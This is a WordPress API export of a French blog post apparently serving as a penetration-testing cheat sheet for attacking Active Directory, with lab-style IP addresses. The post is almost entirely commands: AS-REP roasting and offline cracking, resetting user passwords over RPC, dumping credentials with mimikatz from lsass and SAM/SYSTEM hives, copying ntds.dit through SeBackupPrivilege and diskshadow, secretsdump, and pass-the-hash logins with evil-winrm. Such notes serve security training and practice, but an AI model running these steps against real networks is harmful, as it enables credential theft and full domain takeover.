{"id":143,"date":"2021-05-23T18:51:42","date_gmt":"2021-05-23T23:51:42","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=143"},"modified":"2021-05-27T21:35:25","modified_gmt":"2021-05-28T02:35:25","slug":"activedirectory","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/","title":{"rendered":"ActiveDirectory (AD)"},"content":{"rendered":"

Utiliser SharpHound pour obtenir de l’information et importer dans BloodHound pour analyse. T\u00e9l\u00e9charger PingCastle de pingcastle.com pour g\u00e9n\u00e9rer des rapports<\/p>\n

Obtenir une liste d’utilisateurs d’active directory
\n

smbclient -L \\\\\\\\10.10.10.10\nls\nsmbclient -L \\\\\\\\10.10.10.10\\profile$\nls #permet d'obtenir une liste d'utilisateurs\nGetNPUsers.py mydomain.local\/ -usersfile wordlist -format john -output hashes.txt -dc-ip 10.10.10.10 #kerberos attack from impacket\njohn --wordlist=rockyou.txt hashes.txt \nsmbclient \/\/10.10.10.10\/theshare -U theuser<\/code><\/pre><\/p>\n
Se connecter \u00e0 RPC et r\u00e9initialiser des mots de passe
\n
rpcclient \/\/10.10.10.10 -U theuser (ou rpcclient \/\/10.10.10.10 -U "" ou  enum4linux)\nrpcclient $> srvinfo\nrpcclient $> enumprinters\nrpcclient $> enumdomusers\nrpcclient $> queryuser 0x44f\nrpcclient $> setuserinfo2 audit2020 23 'R0cker123' #r\u00e9initialiser le mot de passe<\/code><\/pre><\/p>\n
Si nous avons un fichier lsass.DMP, nous pouvons l’analyser pour r\u00e9cup\u00e9rer un hash et nous connecter sur d’autres machines
\n
\nps\n.\\mimikatz.exe (antivirus d\u00e9sactiv\u00e9)\nsekurlsa::LogonPassswords\nevil-winrm -i 10.10.10.192 -H 9658d1d1dcd9250115e2205d9f48400d -u svc_backup\n<\/code><\/pre><\/p>\n
Avoir la liste des permissions de l’usager courant
\n
\nwhoami \/all\n<\/code><\/pre><\/p>\n
Escalader les privl\u00e8ges SeBackupPrivilege et SeRestorePrivilege en administrateur
\n
\nreg save HKLM\\SYSTEM c:\\temp\\system.hive\nReg save HKLM\\SAM c:\\temp\\sam.hive\n.\\mimikatz.exe\nprivilege::debug\ntoken::elevate\nlog hash.txt\nlsadump::sam system.hive sam.hive\nevil-winrm -i 10.10.10.60 -H eeef902eae0d740df6257f273ff75051 -u Administrator\n hashcat -m 1000 -a 0 --force --show --username hash.txt (hash.txt au format suivant: Administrateur:hash1,r0cker:hash2) #pour cracker les hash\n<\/code><\/pre><\/p>\n
Comment Extraire ntdis. Mettre dans le fichier germain.txt
\n
\nset context persistent nowriters@\nadd volume c: alias germain@\ncreate@\nexpose %germain% z:@\n<\/code><\/pre><\/p>\n
\ndiskshadow.exe \/s germain.txt\n<\/code><\/pre><\/p>\n
Il faut t\u00e9l\u00e9charger les dll:
\nhttps:\/\/github.com\/giuliano108\/SeBackupPrivilege\/tree\/master\/SeBackupPrivilegeCmdLets\/bin\/Debug<\/p>\n
\nimport-module .\\SeBackupPrivilegeUtils.dll\nimport-module .\\SeBackupPrivilegeCmdLets.dll\nCopy-FileSebackupPrivilege z:\\Windows\\NTDS\\ntds.dit c:\\tmp\\ntds.dit\nls\n<\/code><\/pre><\/p>\n
Extraire NTDS.DIT
\n
\nsecretsdump.py -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -ouput dumphash\nevil-winrm -i 10.10.10.20 -H 123445324546543654 -u Administrator\n<\/code><\/pre><\/p>\n
DCSync permet d’\u00e9muler un controlleur de domaines pour retrouver les mots de passe via une r\u00e9plication de domaine. Quand l’attaqant a un account qui a les privil\u00e8ges de r\u00e9pliquer un domaine, l’attaquant pour utiliser le protocole de r\u00e9plication pour simuler un controleur de domaines.<\/p>\n
Azure-ADConnect.ps1<\/a>
\n
\nimport-module .\/Azure-ADConnect.ps1\nAzure-ADConnect.ps1 -server 127.0.0.1 -db ADSync\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"
Utiliser SharpHound pour obtenir de l’information et importer dans BloodHound pour analyse. T\u00e9l\u00e9charger PingCastle de pingcastle.com pour g\u00e9n\u00e9rer des rapports Obtenir une liste d’utilisateurs d’active directory smbclient -L \\\\\\\\10.10.10.10 ls smbclient -L \\\\\\\\10.10.10.10\\profile$ ls #permet d'obtenir une liste d'utilisateurs GetNPUsers.py mydomain.local\/ -usersfile wordlist -format john -output hashes.txt -dc-ip 10.10.10.10 #kerberos attack from impacket john –wordlist=rockyou.txt hashes.txt smbclient \/\/10.10.10.10\/theshare -U theuser Se connecter \u00e0 RPC et r\u00e9initialiser des mots de passe rpcclient \/\/10.10.10.10 -U theuser (ou rpcclient \/\/10.10.10.10 -U "" ou  enum4linux) rpcclient $> srvinfo rpcclient $> enumprinters rpcclient $> enumdomusers rpcclient $> queryuser 0x44f rpcclient $> setuserinfo2 audit2020 23 'R0cker123' #r\u00e9initialiser <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"yoast_head":"\nActiveDirectory (AD) - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ActiveDirectory (AD) - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Utiliser SharpHound pour obtenir de l’information et importer dans BloodHound pour analyse. T\u00e9l\u00e9charger PingCastle de pingcastle.com pour g\u00e9n\u00e9rer des rapports Obtenir une liste d’utilisateurs d’active directory smbclient -L \\\\10.10.10.10 ls smbclient -L \\\\10.10.10.10profile$ ls #permet d'obtenir une liste d'utilisateurs GetNPUsers.py mydomain.local\/ -usersfile wordlist -format john -output hashes.txt -dc-ip 10.10.10.10 #kerberos attack from impacket john --wordlist=rockyou.txt hashes.txt smbclient \/\/10.10.10.10\/theshare -U theuser Se connecter \u00e0 RPC et r\u00e9initialiser des mots de passe rpcclient \/\/10.10.10.10 -U theuser (ou rpcclient \/\/10.10.10.10 -U "" ou  enum4linux) rpcclient $> srvinfo rpcclient $> enumprinters rpcclient $> enumdomusers rpcclient $> queryuser 0x44f rpcclient $> setuserinfo2 audit2020 23 'R0cker123' #r\u00e9initialiser\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-23T23:51:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-05-28T02:35:25+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/\",\"name\":\"ActiveDirectory (AD) - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-05-23T23:51:42+00:00\",\"dateModified\":\"2021-05-28T02:35:25+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ActiveDirectory (AD)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ActiveDirectory (AD) - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/","og_locale":"fr_CA","og_type":"article","og_title":"ActiveDirectory (AD) - S\u00e9curiser votre site","og_description":"Utiliser SharpHound pour obtenir de l’information et importer dans BloodHound pour analyse. T\u00e9l\u00e9charger PingCastle de pingcastle.com pour g\u00e9n\u00e9rer des rapports Obtenir une liste d’utilisateurs d’active directory smbclient -L \\\\10.10.10.10 ls smbclient -L \\\\10.10.10.10profile$ ls #permet d'obtenir une liste d'utilisateurs GetNPUsers.py mydomain.local\/ -usersfile wordlist -format john -output hashes.txt -dc-ip 10.10.10.10 #kerberos attack from impacket john --wordlist=rockyou.txt hashes.txt smbclient \/\/10.10.10.10\/theshare -U theuser Se connecter \u00e0 RPC et r\u00e9initialiser des mots de passe rpcclient \/\/10.10.10.10 -U theuser (ou rpcclient \/\/10.10.10.10 -U "" ou  enum4linux) rpcclient $> srvinfo rpcclient $> enumprinters rpcclient $> enumdomusers rpcclient $> queryuser 0x44f rpcclient $> setuserinfo2 audit2020 23 'R0cker123' #r\u00e9initialiser","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-05-23T23:51:42+00:00","article_modified_time":"2021-05-28T02:35:25+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/","name":"ActiveDirectory (AD) - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-05-23T23:51:42+00:00","dateModified":"2021-05-28T02:35:25+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/activedirectory\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"ActiveDirectory (AD)"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/143"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=143"}],"version-history":[{"count":10,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/143\/revisions"}],"predecessor-version":[{"id":284,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/143\/revisions\/284"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=143"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=143"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=143"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}